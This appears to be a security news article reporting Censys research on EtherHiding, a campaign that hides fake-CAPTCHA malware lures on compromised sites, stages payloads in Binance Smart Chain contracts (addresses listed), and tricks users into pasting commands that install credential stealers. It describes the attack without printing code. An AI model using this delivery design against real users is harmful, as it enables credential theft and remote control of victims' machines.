A new threat known as EtherHiding is reshaping how malware spreads through the internet. Unlike older methods that rely on traditional servers to deliver harmful code, this attack uses blockchain smart contracts to store and update malware payloads.
The approach makes it harder for security teams to track and stop attackers because the payloads can be changed without modifying the websites where the attack begins.
The attack starts when a hacker injects malicious code into a legitimate website. This injected code displays a fake CAPTCHA page that looks like a real security check, asking visitors to prove they are human.
However, instead of clicking a simple checkbox, victims are tricked into copying and pasting code into their terminal or command prompt.
When they follow these instructions, malware quietly installs onto their computer. The technique takes advantage of user trust and shifts the work of running the code to the victim, which helps the malware avoid detection by security tools that watch for automatic malware execution.
Censys security analysts identified this attack pattern while monitoring websites that hosted fake CAPTCHA lures across multiple domains.
.webp "New EtherHiding Attack Uses Web-Based Attacks to Deliver Malware and Rotate Payloads 3")
During their investigation, researchers discovered an EtherHiding chain that combined blockchain storage, platform-specific malware selection, and social engineering into a complete attack workflow.
The findings revealed how this new approach creates a more flexible and harder-to-track delivery system compared to older methods that used fixed server addresses.
The malware payloads delivered through EtherHiding campaigns typically include commodity stealers like Amos Stealer and Vidar, which are designed to harvest credentials and sensitive information from infected machines.
By combining decentralized staging infrastructure, fake security overlays, and manual user execution, the attackers remove many predictable patterns that defenders traditionally rely on to identify threats.
Blockchain-Powered Payload Delivery Mechanics
The way EtherHiding delivers malware shows how decentralized technology changes attack infrastructure. When a victim visits a compromised website, their browser automatically loads a Base64-encoded JavaScript snippet hidden in the HTML.
This snippet decodes into obfuscated code that contacts smart contracts on the Binance Smart Chain testnet using a function named load_().
The contracts return hex-encoded data that the browser decodes into executable JavaScript, which then determines the victim’s operating system and fetches the appropriate malware version.
The attack uses two distinct contracts to fetch Windows or macOS-specific payloads. For Windows systems, the code connects to contract 0x46790e2Ac7F3CA5a7D1bfCe312d11E91d23383Ff, while macOS victims are directed to 0x68DcE15C1002a2689E19D33A3aE509DD1fEb11A5.
.webp "New EtherHiding Attack Uses Web-Based Attacks to Deliver Malware and Rotate Payloads 4")
Before delivering the final payload, the attack passes through a control contract at 0xf4a32588b50a59a82fbA148d436081A48d80832A that validates each victim using a unique identifier stored in a persistent cookie.
This gating mechanism allows attackers to selectively enable or disable malware delivery for specific victims simply by changing blockchain data, without touching the compromised website.
Once cleared by the gating contract, the victim sees a platform-specific fake CAPTCHA with instructions tailored to their operating system.
The JavaScript automatically copies malicious commands to the clipboard, and victims are instructed to paste the commands into Terminal on macOS or the Run dialog on Windows.
This manual execution step creates a significant detection gap because no automatic malware behavior occurs—the victim themselves triggers the installation process.
On macOS, the payload uses AppleScript and curl commands to download and execute a full-featured agent. This agent creates persistence using LaunchAgent plist files and retrieves its command-and-control server address from Telegram or Steam profiles by scraping specific HTML elements.
The malware then harvests the user’s plaintext password by displaying a fake System Preferences dialog, synchronizes the stolen credentials with the attacker’s server, and enters a polling loop to receive and execute arbitrary shell commands every thirty seconds.
The combination of blockchain smart contracts, fake CAPTCHA social engineering, and local code execution represents a significant shift in attacker tactics.
By moving payload storage onto decentralized infrastructure and removing the need for automatic execution, EtherHiding creates an attack model that is flexible, difficult to predict, and resistant to many traditional security detection methods.
Organizations should monitor for websites displaying fake CAPTCHA overlays and remain vigilant about clipboard activity linked to terminal commands, as these warning signs can help catch this emerging threat before installation occurs.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
